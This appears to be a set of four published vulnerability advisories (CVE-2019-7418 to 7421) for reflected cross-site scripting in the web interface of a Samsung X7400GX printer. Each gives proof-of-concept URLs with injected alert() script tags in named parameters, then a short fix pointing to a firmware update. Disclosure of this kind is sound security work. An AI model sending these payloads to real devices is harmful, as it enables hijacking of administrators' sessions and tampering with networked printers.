SAMSUNG X7400GX Sync Thru Web Cross Site Scripting

`<!--  
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web  
Service  
# Date: 24-01-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.samsungprinter.com/,  
http://www.samsung.com/Support/ProductSupport/download/index.aspx  
# Software Link: http://www.samsungprinter.com/,  
http://www.samsung.com/Support/ProductSupport/download/index.aspx  
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System  
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015  
# Tested on: all  
# CVE : CVE-2019-7418  
# Category: webapps  
  
1. Description  
  
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25  
V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters:  
flag, frame, func, and Nfunc.  
  
  
2. Proof of Concept  
  
URL  
  
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg  
','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org  
&msg=The%20requested%20report(s)%20will%20be%20printed  
  
Parameter  
frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
  
  
URL  
  
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg  
','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org  
&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
  
Parameter  
flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
  
  
URL  
  
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
  
  
Parameter  
Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
  
  
URL  
  
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg  
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
  
Parameter  
func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
  
  
URL  
  
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg  
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
  
Parameter  
type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
  
  
URL  
  
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg  
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
  
Parameter  
popupid=<SCRIPT>alert("XSS");</SCRIPT>  
  
3. Solution:  
  
Update to last version this product.  
Patch:  
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
  
  
-->  
  
  
  
<!--  
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web  
Service  
# Date: 24-01-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.samsungprinter.com/,  
http://www.samsung.com/Support/ProductSupport/download/index.aspx  
# Software Link: http://www.samsungprinter.com/,  
http://www.samsung.com/Support/ProductSupport/download/index.aspx  
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System  
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015  
# Tested on: all  
# CVE : CVE-2019-7419  
# Category: webapps  
  
1. Description  
  
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25  
V11.01.05.25_08-21-2015 in "/sws/leftmenu.sws" in multiple parameters:  
ruiFw_id, ruiFw_pid, ruiFw_title.  
  
  
2. Proof of Concept  
  
URL  
  
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E  
  
  
Parameter  
ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT>  
  
  
URL  
  
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento  
  
  
Parameter  
ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT>  
  
  
URL  
  
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento  
  
  
Parameter  
ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT>  
  
3. Solution:  
  
Update to last version this product.  
Patch:  
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
  
  
-->  
  
  
<!--  
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web  
Service  
# Date: 24-01-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.samsungprinter.com/,  
http://www.samsung.com/Support/ProductSupport/download/index.aspx  
# Software Link: http://www.samsungprinter.com/,  
http://www.samsung.com/Support/ProductSupport/download/index.aspx  
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System  
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015  
# Tested on: all  
# CVE : CVE-2019-7420  
# Category: webapps  
  
1. Description  
  
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25  
V11.01.05.25_08-21-2015 in  
"/sws.application/information/networkinformationView.sws" in the tabName  
  
  
2. Proof of Concept  
  
URL  
  
http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
  
  
Parameter  
tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
  
3. Solution:  
  
Update to last version this product.  
Patch:  
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
  
  
-->  
  
<!--  
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web  
Service  
# Date: 24-01-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.samsungprinter.com/,  
http://www.samsung.com/Support/ProductSupport/download/index.aspx  
# Software Link: http://www.samsungprinter.com/,  
http://www.samsung.com/Support/ProductSupport/download/index.aspx  
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System  
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015  
# Tested on: all  
# CVE : CVE-2019-7421  
# Category: webapps  
  
1. Description  
  
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25  
V11.01.05.25_08-21-2015 in "/sws.login/gnb/loginView.sws" in multiple  
parameters: contextpath and basedURL.  
  
  
2. Proof of Concept  
  
URL  
  
http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org  
  
  
Parameter  
contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
  
  
URL  
  
http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login  
  
  
Parameter  
basedURL=<SCRIPT>alert(XSS);</SCRIPT>  
  
  
3. Solution:  
  
Update to last version this product.  
Patch:  
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
  
  
-->  
  
  
`